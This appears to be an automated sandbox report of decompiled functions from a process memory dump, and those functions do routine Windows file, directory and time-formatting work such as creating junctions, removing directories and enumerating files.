0x4a7432a0
0x4a7432a6
0x4a7432a6
0x4a7432a6
0x4a7432b1
0x4a7432b6
0x4a7432bc
0x4a74ac81
0x4a74ac92
0x4a74ac98
0x4a74ac9e
0x4a74aca3
0x4a74aca9
0x4a74acab
0x4a74acd5
0x4a74acda
0x4a74acdc
0x4a74ad21
0x4a74ad2c
0x4a74adaa
0x4a74adb0
0x4a74adb5
0x4a74adb5
0x4a74adbb
0x4a74adc1
0x4a74addb
0x4a74ade0
0x4a74ade0
0x4a74ade2
0x4a74ade7
0x4a74ade7
0x4a74adc3
0x4a74adc3
0x4a74adca
0x4a74add0
0x4a74add5
0x4a74add5
0x4a74add5
0x4a74adf2
0x00000000
0x4a74adf2
0x4a74acf9
0x4a74acff
0x4a74ad01
0x00000000
0x00000000
0x4a74ad09
0x4a74ad0a
0x4a74ad10
0x4a74ad11
0x4a74ad17
0x4a74ad1d
0x4a74ad1f
0x4a74ad39
0x4a74ad40
0x4a74ad47
0x4a74ad4e
0x4a74ad4f
0x4a74ad55
0x4a74ad56
0x4a74ad5c
0x4a74ad5e
0x4a74ad64
0x4a74ad66
0x4a74ad7c
0x4a74ad8c
0x4a74ad97
0x4a74ad68
0x4a74ad68
0x4a74ad68
0x4a74ad98
0x4a74ad9e
0x4a74ada3
0x4a74ada3
0x4a74ada3
0x00000000
0x4a74ada3
0x00000000
0x4a74ad1f
0x4a74acb8
0x00000000
0x4a7432c2
0x4a7432c2
0x4a7432c2
0x4a7432cf
0x4a7432d4
0x4a7432da
0x4a7432e0
0x4a74adfc
0x4a74ae03
0x00000000
0x00000000
0x4a74ae1c
0x4a74ae21
0x4a74ae23
0x4a74ae50
0x4a74ae56
0x4a74ae5c
0x4a74ae5f
0x4a74ae77
0x4a74ae86
0x4a74ae8c
0x4a74ae8e
0x4a74aeb0
0x4a74aeb5
0x4a74aebf
0x4a74aef4
0x4a74aefe
0x4a74af40
0x4a74af45
0x4a74af4b
0x4a74af4e
0x4a74af4e
0x4a74af52
0x4a74af53
0x4a74af53
0x4a74af58
0x4a74af58
0x4a74af5c
0x4a74af5f
0x4a74af63
0x4a74af68
0x4a74af6e
0x4a74af70
0x4a74af7a
0x4a74af91
0x4a74af91
0x4a74af93
0x4a74af97
0x4a74afa2
0x4a74afa2
0x4a74afb2
0x4a74afb7
0x4a74afbd
0x4a74afc3
0x00000000
0x4a74afc3
0x4a74af07
0x4a74af17
0x4a74af1d
0x4a74af1f
0x00000000
0x00000000
0x4a74af28
0x4a74af28
0x4a74af2a
0x4a74af31
0x4a74af31
0x4a74af38
0x00000000
0x4a74af38
0x4a74aec8
0x4a74aed8
0x4a74aede
0x4a74aee0
0x00000000
0x00000000
0x4a74aeeb
0x00000000
0x4a74aeeb
0x4a74ae90
0x4a74ae95
0x4a74ae95
0x4a74ae9b
0x00000000
0x4a74ae9b
0x4a74ae61
0x00000000
0x4a74ae61
0x4a74ae30
0x4a74ae30
0x00000000
0x4a7432e0
0x4a7432bc
0x4a73a96e
0x00000000
0x4a740bef
0x4a740bfa
0x4a740bfc
0x4a740c01
0x4a740c04
0x4a740c06
0x4a740c08
0x4a73a97f
0x4a73a98d
0x4a73a98d
0x4a740c0e
0x4a740c14
0x4a740c1a
0x00000000
0x4a740c1a

Strings

:, xrefs: 4A74B02C
[..], xrefs: 4A74AE61
[...], xrefs: 4A74AE90
[.], xrefs: 4A74AE25
..., xrefs: 4A74ACAD, 4A74AD21, 4A74AD68, 4A74AF40

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: [...]$ [..]$ [.]$...$:
API String ID: 0-1980097535
Opcode ID: 61f3f4a93de962a988ecc5eb075e6d6481f0c3ba88e7d9cb49bbe932cbeba014
Instruction ID: fee896d7d49aada7d0578bcd98db762e6fe7c12a327a7d923e77e03f8f222394
Opcode Fuzzy Hash: 61f3f4a93de962a988ecc5eb075e6d6481f0c3ba88e7d9cb49bbe932cbeba014
Instruction Fuzzy Hash: 8502B1F190911AAFDB718F60CD45EEABBB9EF15308F0241D5E608E6051EB329E98CF15

Uniqueness

Uniqueness Score: -1.00%

Function 4A751E5F, Relevance: 19.7, APIs: 13, Instructions: 162
filememorynativeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E4A751E5F(void* __ecx, void* __eflags, WCHAR* _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				short _v26;
				void* _v28;
				void* _v36;
				void* _t63;
				WCHAR* _t66;
				intOrPtr* _t78;
				signed short _t82;
				long _t88;
				long _t92;
				short _t94;
				void* _t99;
				short* _t100;
				intOrPtr _t101;
				WCHAR* _t104;
				void* _t105;

				_v8 = 1;
				_v28 = 0;
				_v26 = 0;
				_v24 = 0;
				_v20 = 0;
				_a4 = E4A751B0B(__ecx, _a4[4]);
				_t104 = E4A751B0B(__ecx, _a4[6]);
				_v12 = _t104;
				if(_a4 == 0 || _t104 == 0) {
					L18:
					if(_v24 != 0) {
						RtlFreeHeap( *( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18), 0, _v24);
					}
					if(_v8 != 0 && _v20 != 0) {
						RemoveDirectoryW(_a4);
					}
					return _v8;
				} else {
					if(E4A751BCF(_a4) != 0) {
						if(E4A751B70(_t104) != 0) {
							if(CreateDirectoryW(_a4, 0) == 0) {
								goto L18;
							}
							_v20 = 1;
							_t63 = CreateFileW(_a4, 0x40000000, 1, 0, 3, 0x2000000, 0);
							_v16 = _t63;
							if(_t63 == 0xffffffff) {
								goto L18;
							}
							RtlDosPathNameToNtPathName_U(_t104,  &_v28, 0, 0);
							_t66 = _t104;
							_t18 =  &(_t66[1]); // 0x2
							_t100 = _t18;
							do {
								_t94 =  *_t66;
								_t66 =  &(_t66[1]);
							} while (_t94 != 0);
							_t92 = (_v28 & 0x0000ffff) + 0x14 + (_t66 - _t100 >> 1) * 2;
							_t105 = E4A731896(_t92);
							if(_t105 == 0) {
								L17:
								CloseHandle(_v16);
								goto L18;
							}
							memset(_t105, 0, _t92);
							 *_t105 = 0xa0000003;
							 *((short*)(_t105 + 4)) = _t92 - 8;
							 *((short*)(_t105 + 8)) = 0;
							 *(_t105 + 0xa) = _v28;
							_t30 = _t105 + 0x10; // 0x10
							memcpy(_t30, _v24, _v28 & 0x0000ffff);
							 *((short*)(_t105 + 0xc)) =  *(_t105 + 0xa) + 2;
							_t78 = _v12;
							_t99 = _t78 + 2;
							do {
								_t101 =  *_t78;
								_t78 = _t78 + 2;
							} while (_t101 != 0);
							_t82 = (_t78 - _t99 >> 1) + (_t78 - _t99 >> 1);
							 *(_t105 + 0xe) = _t82;
							memcpy(( *(_t105 + 0xa) & 0x0000ffff) + _t105 + 0x12, _v12, _t82 & 0x0000ffff);
							_t88 = NtFsControlFile(_v16, 0, 0, 0,  &_v36, 0x900a4, _t105, _t92, 0, 0);
							if(_t88 >= 0) {
								_v8 = 0;
							} else {
								SetLastError(RtlNtStatusToDosError(_t88));
							}
							goto L17;
						}
						_push(0x40002749);
						L4:
						SetLastError();
						goto L18;
					}
					_push(0x4000272e);
					goto L4;
				}
			}

0x4a751e77
0x4a751e7a
0x4a751e7e
0x4a751e82
0x4a751e85
0x4a751e90
0x4a751e98
0x4a751e9a
0x4a751ea0
0x4a751ffa
0x4a751ffd
0x4a75200f
0x4a75200f
0x4a752018
0x4a752022
0x4a752022
0x4a75202f
0x4a751eae
0x4a751eb8
0x4a751ed2
0x4a751ee7
0x00000000
0x00000000
0x4a751eff
0x4a751f02
0x4a751f08
0x4a751f0e
0x00000000
0x00000000
0x4a751f1b
0x4a751f21
0x4a751f23
0x4a751f23
0x4a751f26
0x4a751f26
0x4a751f2a
0x4a751f2b
0x4a751f38
0x4a751f42
0x4a751f46
0x4a751ff1
0x4a751ff4
0x00000000
0x4a751ff4
0x4a751f4f
0x4a751f56
0x4a751f5f
0x4a751f63
0x4a751f6b
0x4a751f77
0x4a751f7b
0x4a751f8b
0x4a751f8f
0x4a751f92
0x4a751f95
0x4a751f95
0x4a751f99
0x4a751f9a
0x4a751fa3
0x4a751fa5
0x4a751fb9
0x4a751fd4
0x4a751fdc
0x4a751fee
0x4a751fde
0x4a751fe6
0x4a751fe6
0x00000000
0x4a751fdc
0x4a751ed4
0x4a751ebf
0x4a751ebf
0x00000000
0x4a751ebf
0x4a751eba
0x00000000
0x4a751eba

APIs

Part of subcall function 4A751B0B: GetFullPathNameW.KERNEL32(?,00000000,00000000,?), ref: 4A751B28
Part of subcall function 4A751B0B: SetLastError.KERNEL32(00000008,00000000), ref: 4A751B41

Part of subcall function 4A751B0B: GetFullPathNameW.KERNEL32(?,00000000,00000000,?,00000000), ref: 4A751B54

SetLastError.KERNEL32(40002749), ref: 4A751EBF
CreateDirectoryW.KERNEL32(?,00000000), ref: 4A751EDF
CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000000,00000000), ref: 4A751F02
RtlDosPathNameToNtPathName_U.NTDLL ref: 4A751F1B
memset.MSVCRT ref: 4A751F4F
memcpy.MSVCRT ref: 4A751F7B
memcpy.MSVCRT ref: 4A751FB9
NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,00000000,?,00000000,00000000), ref: 4A751FD4
RtlNtStatusToDosError.NTDLL ref: 4A751FDF
SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 4A751FE6
CloseHandle.KERNEL32(?), ref: 4A751FF4
RtlFreeHeap.NTDLL(?,00000000,?), ref: 4A75200F
RemoveDirectoryW.KERNEL32(?), ref: 4A752022

Part of subcall function 4A751BCF: GetVolumePathNameW.KERNEL32 ref: 4A751BF6

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Path$ErrorName$Last$CreateDirectoryFileFullmemcpy$CloseControlFreeHandleHeapName_RemoveStatusVolumememset
String ID:
API String ID: 4118313034-0
Opcode ID: 74cb49633a7ed7ba150e2319e91bf76075c9cdc2ee03225223da5b730b40e16c
Instruction ID: c0acc987d0af0ec16b7715b188e20a265949b2587f81bd9869a166e2e65519a9
Opcode Fuzzy Hash: 74cb49633a7ed7ba150e2319e91bf76075c9cdc2ee03225223da5b730b40e16c
Instruction Fuzzy Hash: 9751C37190620AEBCB30AFA5CC48CEFBFB8EF45746B014519F546E7914E7308A45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 4A73D701, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 217
timeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E4A73D701(void* __esi, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				short _v72;
				short _v328;
				signed int _v332;
				signed short _v334;
				signed short _v336;
				signed int _v338;
				signed int _v340;
				struct _SYSTEMTIME _v348;
				signed int _v352;
				struct _FILETIME _v360;
				struct _FILETIME _v368;
				void* __ebx;
				void* __edi;
				signed int _t54;
				signed int _t64;
				signed int _t68;
				signed int _t71;
				signed int _t75;
				int _t84;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t92;
				signed int _t98;
				int _t103;
				signed int _t108;
				signed int _t109;
				signed int _t112;
				signed int _t113;
				void* _t115;
				signed int _t116;
				signed int _t117;
				void _t118;
				void* _t119;
				void* _t121;
				signed int _t122;
				void* _t123;

				_t119 = __esi;
				_t54 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t54 ^ _t122;
				_t56 = _a4;
				_t117 = _a12;
				_v352 = _t117;
				if(_a4 != 0) {
					E4A7430B6(_t56,  &_v360);
				} else {
					GetSystemTime( &_v348);
					SystemTimeToFileTime( &_v348,  &_v360);
				}
				FileTimeToLocalFileTime( &_v360,  &_v368);
				FileTimeToSystemTime( &_v368,  &_v348);
				if(_a8 != 1) {
					__eflags =  *0x4a754081;
					_t103 = 2;
					if( *0x4a754081 == 0) {
						__eflags =  *0x4a754090;
						_t64 = _v340 & 0x0000ffff;
						_t116 = 0x4a754bc0;
						if( *0x4a754090 == 0) {
							_t116 = E4A7325B8;
						} else {
							_t109 = 0xc;
							__eflags = _t64 - _t109;
							if(__eflags < 0) {
								__eflags = _t64;
								if(_t64 == 0) {
									_t64 = _t109;
								}
							} else {
								if(__eflags > 0) {
									__eflags = _t64;
								}
								_t116 = 0x4a754b80;
							}
						}
						_push(_t116);
						_push(_v338 & 0x0000ffff);
						_push(0x4a754950);
						E4A73179D( &_v72, 0x20, L"%02d%s%02d%s", _t64);
						L26:
						_push( &_v72);
						__eflags = _t117;
						if(_t117 == 0) {
							_t68 = E4A73C5A0();
							goto L7;
						}
						_push(_a16);
						_push(_t117);
						E4A73185A();
						_t71 = _t117;
						_t116 = _t71 + 2;
						do {
							_t108 =  *_t71;
							_t71 = _t71 + _t103;
							__eflags = _t108;
						} while (_t108 != 0);
						goto L6;
					}
					_v332 = _v332 & 0x00000000;
					_push(_t119);
					_t34 = _t103 + 0x7e; // 0x80
					_t120 = _t34;
					_t75 = GetLocaleInfoW(E4A73756D(), 0x1003,  &_v328, _t34);
					__eflags = _t75;
					if(_t75 == 0) {
						E4A73185A( &_v328, _t120, L"HH:mm:ss t");
					}
					__eflags = _v328;
					_t121 =  &_v328;
					if(_v328 != 0) {
						do {
							_t118 =  *_t121 & 0x0000ffff;
							__eflags = _t118 - 0x27;
							if(_t118 == 0x27) {
								__eflags = _v332;
								_v332 = 0 | _v332 == 0x00000000;
								L10:
								_t121 = _t121 + _t103;
								__eflags = _t121;
								goto L11;
							}
							__eflags = _v332;
							if(_v332 != 0) {
								goto L10;
							}
							__eflags = _t118 - 0x68;
							if(_t118 == 0x68) {
								L17:
								_t85 = 0;
								__eflags = 0;
								do {
									_t121 = _t121 + _t103;
									_t85 = _t85 + 1;
									__eflags =  *_t121 - _t118;
								} while ( *_t121 == _t118);
								_t121 = _t121 +  ~_t85 * 2;
								__eflags = _t85 - 1;
								if(_t85 != 1) {
									goto L10;
								}
								_t86 = _t121;
								_t30 = _t86 + 2; // 0x2
								_t116 = _t30;
								goto L8;
								L8:
								_t112 =  *_t86;
								_t86 = _t86 + _t103;
								__eflags = _t112;
								if(_t112 != 0) {
									goto L8;
								} else {
									_t87 = _t86 - _t116;
									__eflags = _t87;
									_t26 = _t121 + 2; // 0x2
									memmove(_t26, _t121, (_t87 >> 1) + (_t87 >> 1) + 2);
									_t123 = _t123 + 0xc;
									 *_t121 = _t118;
									goto L10;
								}
							}
							__eflags = _t118 - 0x48;
							if(_t118 == 0x48) {
								goto L17;
							}
							__eflags = _t118 - 0x6d;
							if(_t118 != 0x6d) {
								goto L11;
							}
							goto L17;
							L11:
							_t121 = _t121 + _t103;
							__eflags =  *_t121;
						} while ( *_t121 != 0);
						_t117 = _v352;
						goto L25;
					} else {
						L25:
						_t84 = GetTimeFormatW(E4A73756D(), _t103,  &_v348,  &_v328,  &_v72, 0x20);
						_pop(_t119);
						__eflags = _t84;
						if(_t84 == 0) {
							_v72 = _t84;
						}
						goto L26;
					}
				} else {
					_t92 = _v334 & 0x0000ffff;
					_t113 = 0xa;
					asm("cdq");
					_t116 = _t92 % _t113;
					_push(_t92 / _t113);
					_push(0x4a754930);
					_push(_v336 & 0x0000ffff);
					_push(0x4a754950);
					_push(_v338 & 0x0000ffff);
					_push(0x4a754950);
					_push(_v340 & 0x0000ffff);
					_push(L"%2d%s%02d%s%02d%s%02d");
					if(_t117 == 0) {
						_t68 = E4A7358F3();
						goto L7;
					} else {
						_push(_a16);
						_push(_t117);
						E4A73179D();
						_t98 = _t117;
						_t116 = _t98 + 2;
						_t103 = 2;
						do {
							_t115 =  *_t98;
							_t98 = _t98 + _t103;
						} while (_t115 != 0);
						L6:
						_t68 = _t71 - _t116 >> 1;
						L7:
						return E4A7313A9(_t68, _t103, _v8 ^ _t122, _t116, _t117, _t119);
					}
				}
			}

0x4a73d701
0x4a73d70c
0x4a73d713
0x4a73d716
0x4a73d71b
0x4a73d71e
0x4a73d726
0x4a7430a7
0x4a73d72c
0x4a73d733
0x4a73d747
0x4a73d747
0x4a73d75b
0x4a73d76f
0x4a73d779
0x4a742add
0x4a742ae6
0x4a742ae7
0x4a74508b
0x4a745092
0x4a745099
0x4a74509e
0x4a7450ba
0x4a7450a0
0x4a7450a2
0x4a7450a3
0x4a7450a5
0x4a7450b2
0x4a7450b4
0x4a7450b6
0x4a7450b6
0x4a7450a7
0x4a7450a7
0x4a7450a9
0x4a7450a9
0x4a7450ab
0x4a7450ab
0x4a7450a5
0x4a7450c6
0x4a7450c7
0x4a7450c8
0x4a7450d9
0x4a742b57
0x4a742b5a
0x4a742b5b
0x4a742b5d
0x4a7450e6
0x00000000
0x4a7450e6
0x4a742b63
0x4a742b66
0x4a742b67
0x4a742b6c
0x4a742b6e
0x4a742b71
0x4a742b71
0x4a742b74
0x4a742b76
0x4a742b76
0x00000000
0x4a742b7b
0x4a742aed
0x4a742af4
0x4a742af5
0x4a742af5
0x4a742b0b
0x4a742b11
0x4a742b13
0x4a745062
0x4a745062
0x4a742b19
0x4a742b21
0x4a742b27
0x4a742a90
0x4a742a90
0x4a742a93
0x4a742a97
0x4a74506e
0x4a745077
0x4a742a86
0x4a742a86
0x4a742a86
0x00000000
0x4a742a86
0x4a742a9d
0x4a742aa4
0x00000000
0x00000000
0x4a742aa6
0x4a742aaa
0x4a742ab8
0x4a742ab8
0x4a742ab8
0x4a742aba
0x4a742aba
0x4a742abc
0x4a742abd
0x4a742abd
0x4a742ac6
0x4a742ac9
0x4a742acc
0x00000000
0x00000000
0x4a742ace
0x4a742ad0
0x4a742ad0
0x4a742ad3
0x4a742a62
0x4a742a62
0x4a742a65
0x4a742a67
0x4a742a6a
0x00000000
0x4a742a6c
0x4a742a6c
0x4a742a6c
0x4a742a75
0x4a742a7a
0x4a742a80
0x4a742a83
0x00000000
0x4a742a83
0x4a742a6a
0x4a742aac
0x4a742ab0
0x00000000
0x00000000
0x4a742ab2
0x4a742ab6
0x00000000
0x00000000
0x00000000
0x4a742a88
0x4a742a88
0x4a742a8a
0x4a742a8a
0x4a742ad5
0x00000000
0x4a742b2d
0x4a742b2d
0x4a742b48
0x4a742b4e
0x4a742b4f
0x4a742b51
0x4a745082
0x4a745082
0x00000000
0x4a742b51
0x4a73d77f
0x4a73d77f
0x4a73d788
0x4a73d789
0x4a73d78a
0x4a73d793
0x4a73d79b
0x4a73d7a0
0x4a73d7a6
0x4a73d7a7
0x4a73d7a8
0x4a73d7b0
0x4a73d7b1
0x4a73d7b8
0x4a745048
0x00000000
0x4a73d7be
0x4a73d7be
0x4a73d7c1
0x4a73d7c2
0x4a73d7ca
0x4a73d7ce
0x4a73d7d1
0x4a73d7d2
0x4a73d7d2
0x4a73d7d5
0x4a73d7d7
0x4a73d7dc
0x4a73d7de
0x4a73d7e0
0x4a73d7ed
0x4a73d7ed
0x4a73d7b8

APIs

GetSystemTime.KERNEL32(?,00002000,75A9A9E9), ref: 4A73D733
SystemTimeToFileTime.KERNEL32(?,?), ref: 4A73D747
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 4A73D75B
FileTimeToSystemTime.KERNEL32(?,?), ref: 4A73D76F
GetLocaleInfoW.KERNEL32(00000000,00001003,?,00000080,4A760640), ref: 4A742B0B
GetTimeFormatW.KERNEL32(00000000,00000002,?,00000000,?,00000020), ref: 4A742B48

Part of subcall function 4A73179D: _vsnwprintf.MSVCRT ref: 4A7317CB

Strings

HH:mm:ss t, xrefs: 4A745055
%2d%s%02d%s%02d%s%02d, xrefs: 4A73D7B1
%02d%s%02d%s, xrefs: 4A7450CE

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Time$File$System$FormatInfoLocalLocale_vsnwprintf
String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
API String ID: 1064561440-2516506544
Opcode ID: 309928b15440b0c3b5ca065317d301cef4a4013369705eb13c0e4935a27ce225
Instruction ID: 071060c7e7338dac48e1251f19a78e0b6abc404350eb0e29b1875a92ffd8ab04
Opcode Fuzzy Hash: 309928b15440b0c3b5ca065317d301cef4a4013369705eb13c0e4935a27ce225
Instruction Fuzzy Hash: 7471B972905219EADB708FA0CC44BEB7BBDEB48341F024495E909DB151E7749E8CCBA1

Uniqueness

Uniqueness Score: -1.00%

Function 4A750202, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E4A750202(void* __ebx, void* __edi, WCHAR* _a4) {
				signed int _v8;
				short _v12;
				short _v14;
				short _v16;
				signed int _v20;
				WCHAR* _v24;
				void* __esi;
				signed int _t17;
				signed int _t23;
				long _t25;
				signed int _t26;
				void* _t31;
				void* _t35;
				void* _t36;
				WCHAR* _t38;
				signed int _t39;

				_t36 = __edi;
				_t31 = __ebx;
				_t17 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t17 ^ _t39;
				_v20 = _v20 & 0x00000000;
				_t38 = _a4;
				if(GetFullPathNameW(_t38, 4,  &_v16,  &_v24) != 3 || _v14 != 0x3a || _v12 != 0x5c) {
					_push(_t31);
					if(RemoveDirectoryW(_t38) == 0) {
						_push(_t36);
						_t25 = GetLastError();
						_v20 = _t25;
						if(_t25 == 5) {
							_t26 = GetFileAttributesW(_t38);
							if(_t26 != 0xffffffff && (_t26 & 0x00000001) != 0 && SetFileAttributesW(_t38, _t26 & 0xfffffffe) != 0) {
								if(RemoveDirectoryW(_t38) == 0) {
									_v20 = GetLastError();
								} else {
									_v20 = _v20 & 0x00000000;
								}
							}
						}
						_pop(_t36);
					}
					_t23 = _v20;
					_pop(_t31);
				} else {
					_t23 = 0;
				}
				return E4A7313A9(_t23, _t31, _v8 ^ _t39, _t35, _t36, _t38);
			}

0x4a750202
0x4a750202
0x4a75020a
0x4a750211
0x4a750214
0x4a750219
0x4a750230
0x4a750244
0x4a750250
0x4a750252
0x4a750259
0x4a75025b
0x4a750261
0x4a750264
0x4a75026d
0x4a750287
0x4a750291
0x4a750289
0x4a750289
0x4a750289
0x4a750287
0x4a75026d
0x4a750294
0x4a750294
0x4a750295
0x4a750298
0x4a750240
0x4a750240
0x4a750240
0x4a7502a5

APIs

GetFullPathNameW.KERNEL32(4A7508D8,00000004,?,?,74EC43D5), ref: 4A750227
RemoveDirectoryW.KERNEL32(4A7508D8,?), ref: 4A75024C
GetLastError.KERNEL32(00000104), ref: 4A750259
GetFileAttributesW.KERNEL32(4A7508D8), ref: 4A750264
SetFileAttributesW.KERNEL32(4A7508D8,00000000), ref: 4A750278
RemoveDirectoryW.KERNEL32(4A7508D8), ref: 4A750283
GetLastError.KERNEL32 ref: 4A75028F

Strings

:, xrefs: 4A750232
\, xrefs: 4A750239

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributesDirectoryErrorFileLastRemove$FullNamePath
String ID: :$\
API String ID: 4091459551-1166558509
Opcode ID: e47223b2f084d78b91a958f08a03fe0c9685469d00ba813d63dbb5dc01965c36
Instruction ID: 514d99d473cdf6c1bacf4c19813d1ced8f1aacebeeb71eb6578b475d06e0da13
Opcode Fuzzy Hash: e47223b2f084d78b91a958f08a03fe0c9685469d00ba813d63dbb5dc01965c36
Instruction Fuzzy Hash: 4D113B72905219AFEB60DFA4CC41ADEBBFCAF06265F010515E415E3840D770CA4AC768

Uniqueness

Uniqueness Score: -1.00%

Function 4A732E73, Relevance: 15.1, APIs: 10, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E4A732E73(void* __ecx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, void** _a24) {
				void* _v5;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t26;
				void* _t28;
				signed int _t38;
				signed int _t40;
				void** _t45;

				_v5 = 0;
				_t22 = FindFirstFileExW(_a8, 0 | _a16 == 0x00000000, _a20, 0, 0, 2);
				_t45 = _a24;
				 *_t45 = _t22;
				if(_t22 != 0xffffffff) {
					while(1) {
						_t23 = _a4(_a20, _a12);
						__eflags = _t23;
						if(_t23 != 0) {
							break;
						}
						_t24 = FindNextFileW( *_t45, _a20);
						__eflags = _t24;
						if(_t24 == 0) {
							FindClose( *_t45);
							 *_t45 =  *_t45 | 0xffffffff;
							L6:
							__eflags =  *_t45 - 0xffffffff;
							if( *_t45 == 0xffffffff) {
								L12:
								__eflags = _v5;
								if(_v5 != 0) {
									L2:
									_t26 = _v5;
									L3:
									return _t26;
								}
								goto L1;
							}
							_t28 =  *0x4a75412c; // 0x0
							__eflags = _t28;
							if(_t28 == 0) {
								_t28 = HeapAlloc(GetProcessHeap(), 0, 0x14);
								L14:
								 *0x4a75412c = _t28;
								L9:
								__eflags = _t28;
								if(_t28 != 0) {
									_t40 =  *0x4a754134; // 0x0
									 *(_t28 + _t40 * 4) =  *_t45;
									 *0x4a754134 =  *0x4a754134 + 1;
									__eflags =  *0x4a754134;
								}
								_v5 = 1;
								goto L12;
							}
							_t38 =  *0x4a754134; // 0x0
							__eflags = _t38 -  *0x4a754130; // 0x0
							if(__eflags >= 0) {
								_t28 = HeapReAlloc(GetProcessHeap(), 0, _t28, 4 + _t38 * 4);
								__eflags = _t28;
								if(_t28 == 0) {
									 *0x4a754128 = GetLastError();
									FindClose( *_t45);
									 *_t45 =  *_t45 | 0xffffffff;
									_t26 = 0;
									goto L3;
								}
								 *0x4a754130 =  *0x4a754130 + 1;
								goto L14;
							}
							goto L9;
						}
						__eflags =  *_t45 - 0xffffffff;
						if( *_t45 != 0xffffffff) {
							continue;
						}
						goto L6;
					}
					 *0x4a754128 = 0;
					_v5 = 1;
					goto L6;
				}
				L1:
				 *0x4a754128 = GetLastError();
				goto L2;
			}

0x4a732e8d
0x4a732e94
0x4a732e9a
0x4a732e9d
0x4a732ea2
0x4a732eeb
0x4a732ef1
0x4a732efa
0x4a732efc
0x00000000
0x00000000
0x4a73fd5b
0x4a73fd61
0x4a73fd63
0x4a740e83
0x4a740e85
0x4a732f0c
0x4a732f0c
0x4a732f0f
0x4a732f49
0x4a732f49
0x4a732f4c
0x4a732eaf
0x4a732eaf
0x4a732eb2
0x4a732eb6
0x4a732eb6
0x00000000
0x4a732f52
0x4a732f11
0x4a732f16
0x4a732f18
0x4a7375bb
0x4a7375a7
0x4a7375a7
0x4a732f30
0x4a732f30
0x4a732f32
0x4a732f36
0x4a732f3c
0x4a732f3f
0x4a732f3f
0x4a732f3f
0x4a732f45
0x00000000
0x4a732f45
0x4a732f1e
0x4a732f24
0x4a732f2a
0x4a7375f1
0x4a7375f7
0x4a7375f9
0x4a74b278
0x4a74b27f
0x4a74b281
0x4a74b284
0x00000000
0x4a74b284
0x4a7375ff
0x00000000
0x4a7375ff
0x00000000
0x4a732f2a
0x4a73fd69
0x4a73fd6c
0x00000000
0x00000000
0x00000000
0x4a73fd72
0x4a732f02
0x4a732f08
0x00000000
0x4a732f08
0x4a732ea4
0x4a732eaa
0x00000000

APIs

FindFirstFileExW.KERNEL32(00000004,00000000,?,00000000,00000000,00000002,00000000,00000000,00000000,?,?,4A739D97,4A739D6F,?,00000000,4A739BCF), ref: 4A732E94
GetLastError.KERNEL32(?,4A739D97,4A739D6F,?,00000000,4A739BCF,00000004,?,?,4A739BCF,?,00000004,?,00000000), ref: 4A732EA4

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: 10301a0f06b4eb0afa221941b10a6243e1d72101c89b7587f485211b6af640b4
Instruction ID: 0a10856cf0f1a42260938161c60bdb7e408480dd4c2e155e4c5422c0b26ce2a7
Opcode Fuzzy Hash: 10301a0f06b4eb0afa221941b10a6243e1d72101c89b7587f485211b6af640b4
Instruction Fuzzy Hash: 903126B1589206EFDF708FA0C84A9997F7DFF26362B124628E691C2992C7318C49CF50

Uniqueness

Uniqueness Score: -1.00%

Function 4A74D539, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 101
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E4A74D539() {
				intOrPtr _v8;
				struct HINSTANCE__* _t4;
				void* _t7;
				signed int _t10;

				_v8 = 0;
				_t10 =  *0x4a77092c; // 0x0
				if(_t10 != 0) {
				}
				_t4 = LoadLibraryW(L"NTDLL.DLL");
				 *0x4a77092c = _t4;
				if(_t4 == 0) {
					 *0x4a77092c =  *0x4a77092c | 0xffffffff;
					goto ( *((intOrPtr*)(_t7 +  &M4A770928)));
					goto L5;
				}
				M4A770928 = GetProcAddress(_t4, "NtQueryInformationProcess");
				goto L5;
			}

0x4a74d547
0x4a74d54a
0x4a74d550
0x4a74d550
0x4a74d557
0x4a74d55d
0x4a74d564
0x4a74d579
0x4a74d57f
0x00000000
0x4a74d57f
0x4a74d572
0x00000000

APIs

LoadLibraryW.KERNEL32(NTDLL.DLL,00000000), ref: 4A74D557
GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 4A74D56C
ReadProcessMemory.KERNEL32(00000001,?,?,00000248,?,?), ref: 4A74D5C3
